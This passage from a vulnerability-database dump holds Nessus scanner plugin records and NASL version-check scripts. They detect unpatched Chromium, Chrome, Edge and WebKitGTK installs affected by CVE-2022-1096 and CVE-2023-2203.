value:\"https://www.debian.org/security/2022/dsa-5110\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-1096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 99.0.4844.84-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '99.0.4844.84-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '99.0.4844.84-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T14:44:16", "description": "The remote Ubuntu 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-5350-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-28T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS : Chromium vulnerability (USN-5350-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-07-12T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:chromium-browser", "p-cpe:/a:canonical:ubuntu_linux:chromium-browser-l10n", "p-cpe:/a:canonical:ubuntu_linux:chromium-chromedriver", "p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg", "p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg-extra"], "id": "UBUNTU_USN-5350-1.NASL", "href": "https://www.tenable.com/plugins/nessus/159243", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5350-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159243);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/12\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"USN\", value:\"5350-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Ubuntu 18.04 LTS : Chromium vulnerability (USN-5350-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the\nUSN-5350-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5350-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-browser-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg-extra\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022-2023 Canonical, Inc. / NASL script (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('18.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '18.04', 'pkgname': 'chromium-browser', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-browser-l10n', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-chromedriver', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-codecs-ffmpeg', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-codecs-ffmpeg-extra', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser / chromium-browser-l10n / chromium-chromedriver / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T15:17:44", "description": "The version of Google Chrome installed on the remote Windows host is prior to 99.0.4844.84. It is, therefore, affected by a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "nessus", "title": "Google Chrome < 99.0.4844.84 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_99_0_4844_84.NASL", "href": "https://www.tenable.com/plugins/nessus/159235", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159235);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Google Chrome < 99.0.4844.84 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 99.0.4844.84. It is, therefore, affected\nby a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1309225\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 99.0.4844.84 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'99.0.4844.84', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T15:17:13", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 99.0.1150.55. It is, therefore, affected by a vulnerability as referenced in the March 26, 2022 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-26T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 99.0.1150.55 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "href": "https://www.tenable.com/plugins/nessus/159239", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159239);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 99.0.1150.55 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 99.0.1150.55. It is, therefore, affected\nby a vulnerability as referenced in the March 26, 2022 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#march-26-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?991726b8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 99.0.1150.55 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nvar constraints = [\n { 'fixed_version' : '99.0.1150.55' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T15:16:00", "description": "The version of Google Chrome installed on the remote macOS host is prior to 99.0.4844.84. It is, therefore, affected by a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "nessus", "title": "Google Chrome < 99.0.4844.84 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "href": "https://www.tenable.com/plugins/nessus/159236", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159236);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Google Chrome < 99.0.4844.84 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 99.0.4844.84. It is, therefore, affected by\na vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1309225\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 99.0.4844.84 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'99.0.4844.84', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-04T19:04:06", "description": "The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2023-2653 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-15T00:00:00", "type": "nessus", "title": "Oracle Linux 9 : webkit2gtk3 (ELSA-2023-2653)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-08-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:9", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2023-2653.NASL", "href": "https://www.tenable.com/plugins/nessus/175689", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2023-2653.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(175689);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/02\");\n\n script_cve_id(\"CVE-2023-2203\");\n\n script_name(english:\"Oracle Linux 9 : webkit2gtk3 (ELSA-2023-2653)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2023-2653 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2023-2653.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle 